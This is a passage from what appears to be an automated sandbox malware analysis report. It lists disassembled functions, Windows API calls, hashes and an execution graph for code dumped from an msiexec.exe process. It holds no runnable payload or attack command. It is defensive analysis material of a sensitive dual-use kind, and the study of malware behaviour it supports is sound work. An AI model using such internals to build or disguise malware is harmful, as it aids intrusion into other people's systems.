                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 493641738-0
                                                                                            • Opcode ID: 0b1517858cfc6358ecb66650b4311069581f45bc104c945ee176bec0c95fb46c
                                                                                            • Instruction ID: 3f126e283be8022302d791d69c57805e665bb67a3a7835b41d0fdfc27963803d
                                                                                            • Opcode Fuzzy Hash: 0b1517858cfc6358ecb66650b4311069581f45bc104c945ee176bec0c95fb46c
                                                                                            • Instruction Fuzzy Hash: 83F0E9271412147BD2212719AC85E7FBB7CEFC5B20B40001DFB0883194AB94686282B5
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F591D0
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F591E2
                                                                                            • _free.LIBCMT ref: 22F591F4
                                                                                            • _free.LIBCMT ref: 22F59206
                                                                                            • _free.LIBCMT ref: 22F59218
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 6b84da1e8e7740b4507ff03fa45c09108f8f6320a641c935a154d26947e76b5b
                                                                                            • Instruction ID: 5ed7e393aca8a52789abbac12aeaeed7a289b38a3ab7983aff7a11a9f8e43bda
                                                                                            • Opcode Fuzzy Hash: 6b84da1e8e7740b4507ff03fa45c09108f8f6320a641c935a154d26947e76b5b
                                                                                            • Instruction Fuzzy Hash: F8F0FFB155835CA79A38DA54E6C5C16BBDBEB207147500C05EF29DB504CB34F8A18BA0
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F5536F
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F55381
                                                                                            • _free.LIBCMT ref: 22F55394
                                                                                            • _free.LIBCMT ref: 22F553A5
                                                                                            • _free.LIBCMT ref: 22F553B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: fdd1b89fd1df5f9dc66291322baa1265de771207594b28ffe80a8e671108f8ab
                                                                                            • Instruction ID: e4ffab74db0cd27a953b4b6b5d88c3e0c80538031f527f88cfc57559854b2327
                                                                                            • Opcode Fuzzy Hash: fdd1b89fd1df5f9dc66291322baa1265de771207594b28ffe80a8e671108f8ab
                                                                                            • Instruction Fuzzy Hash: 09F05470C95319DF8A2A5F24A580428BBB3F725F243010906FD309B35DD77919229B80
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 22F54C1D
                                                                                            • _free.LIBCMT ref: 22F54CE8
                                                                                            • _free.LIBCMT ref: 22F54CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Windows\System32\msiexec.exe
                                                                                            • API String ID: 2506810119-1382325751
                                                                                            • Opcode ID: 0b63e32693aa1c23d45edc40f492338e8a86ef1bed1460f2c98172d7643d5312
                                                                                            • Instruction ID: c1e838b1f2302e0086143a2d94fe993f6f8114340eedaa8d429802393d2d5689
                                                                                            • Opcode Fuzzy Hash: 0b63e32693aa1c23d45edc40f492338e8a86ef1bed1460f2c98172d7643d5312
                                                                                            • Instruction Fuzzy Hash: 16319071A40308BFDB15CF99D984D9EBBFEEBD5710F104066EA24AB200D7709A61CB60
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22F56FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22F58731
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22F587BA
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22F587CC
                                                                                            • __freea.LIBCMT ref: 22F587D5
                                                                                              • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: f39fb2183669501e6585a58ca5b6573a0117a6b166d4bb0f20efc33be57da289
                                                                                            • Instruction ID: dfd5434362527ee0a43e7207863074a4e5061453623a1fde5c8e566aefede517
                                                                                            • Opcode Fuzzy Hash: f39fb2183669501e6585a58ca5b6573a0117a6b166d4bb0f20efc33be57da289
                                                                                            • Instruction Fuzzy Hash: E631CF72A0130AABDF188F64DC84EAF7BA6EF44714F400268FE05DB190E735D9A5CB90
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(22F5C7DD), ref: 22F5C7E6
                                                                                            • GetModuleHandleA.KERNEL32(?,22F5C7DD), ref: 22F5C838
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 22F5C860
                                                                                              • Part of subcall function 22F5C803: GetProcAddress.KERNEL32(00000000,22F5C7F4), ref: 22F5C804
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID:
                                                                                            • API String ID: 1646373207-0
                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction ID: 5137823d0161e4020dab0061df209b727ed807bffea767772b70d4c14f571c6b
                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction Fuzzy Hash: 66016401A857403CAB1482740C00EBA6FEB9B33767B101B96E343C7093C9AC8636C3F6
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22F51D66,00000000,00000000,?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue), ref: 22F55D13
                                                                                            • GetLastError.KERNEL32(?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue,22F5E190,FlsSetValue,00000000,00000364,?,22F55BC8), ref: 22F55D1F
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22F55C88,22F51D66,00000000,00000000,00000000,?,22F55E85,00000006,FlsSetValue,22F5E190,FlsSetValue,00000000), ref: 22F55D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: b91d477a27b5c115713f1ddd1695881fc806c6529c6545ab3f060676834168bc
                                                                                            • Instruction ID: a14f7034ef88be1cdd1aae92d8359403379074494c239a28db58bcb4e3259902
                                                                                            • Opcode Fuzzy Hash: b91d477a27b5c115713f1ddd1695881fc806c6529c6545ab3f060676834168bc
                                                                                            • Instruction Fuzzy Hash: 5E01F73774A322BBC3114A6C8C4CF46B759AF05AA17110A20FF1BD7148D734D821CAE0
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F5655C
                                                                                              • Part of subcall function 22F562BC: IsProcessorFeaturePresent.KERNEL32(00000017,22F562AB,00000000,?,?,?,?,00000016,?,?,22F562B8,00000000,00000000,00000000,00000000,00000000), ref: 22F562BE
                                                                                              • Part of subcall function 22F562BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22F562E0
                                                                                              • Part of subcall function 22F562BC: TerminateProcess.KERNEL32(00000000), ref: 22F562E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2667617558-3972193922
                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction ID: 8a7c83171311d00ff10a72c6ea3500b8ab8dd1cfd41d91358460290a3c113211
                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction Fuzzy Hash: F951A275E0030AEFDF14CFA8C980AADBBF6EF58314F248169DA64E7305E6359A11CB50
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: : $Se.
                                                                                            • API String ID: 4218353326-4089948878
                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction ID: eaa7ff15e9a3ee816b40bf121e9630b1c982f3f21d35f776385cdb970747809e
                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                            • Instruction Fuzzy Hash: 0A11C1B5900348AEDB14CFAC9840BEEFBFDEF19304F10405AE645E7212E6706A128B65
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 22F52903
                                                                                              • Part of subcall function 22F535D2: RaiseException.KERNEL32(?,?,?,22F52925,00000000,00000000,00000000,?,?,?,?,?,22F52925,?,22F621B8), ref: 22F53632
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 22F52920
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 952c0758de919df255071a1daa7b4a4550d3193d4aa181a1afe2f4a11e2f6235
                                                                                            • Instruction ID: e3eb706f8138cc6cb0002815258923d4188a0a7f0bbbd820e0e44ee9b939a840
                                                                                            • Opcode Fuzzy Hash: 952c0758de919df255071a1daa7b4a4550d3193d4aa181a1afe2f4a11e2f6235
                                                                                            • Instruction Fuzzy Hash: 21F0C839A0430D77AB08ABE5EC94D6D776FAF20750B904371EB24A6190EBB1EA35C5C0

                                                                                            Execution Graph

                                                                                            Execution Coverage:5.8%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.3%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:74
                                                                                            execution_graph 40275 441819 40278 430737 40275->40278 40277 441825 40279 430756 40278->40279 40280 43076d 40278->40280 40281 430774 40279->40281 40282 43075f 40279->40282 40280->40277 40293 43034a memcpy 40281->40293 40292 4169a7 11 API calls 40282->40292 40285 4307ce 40286 430819 memset 40285->40286 40294 415b2c 11 API calls 40285->40294 40286->40280 40287 43077e 40287->40280 40287->40285 40290 4307fa 40287->40290 40289 4307e9 40289->40280 40289->40286 40295 4169a7 11 API calls 40290->40295 40292->40280 40293->40287 40294->40289 40295->40280 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 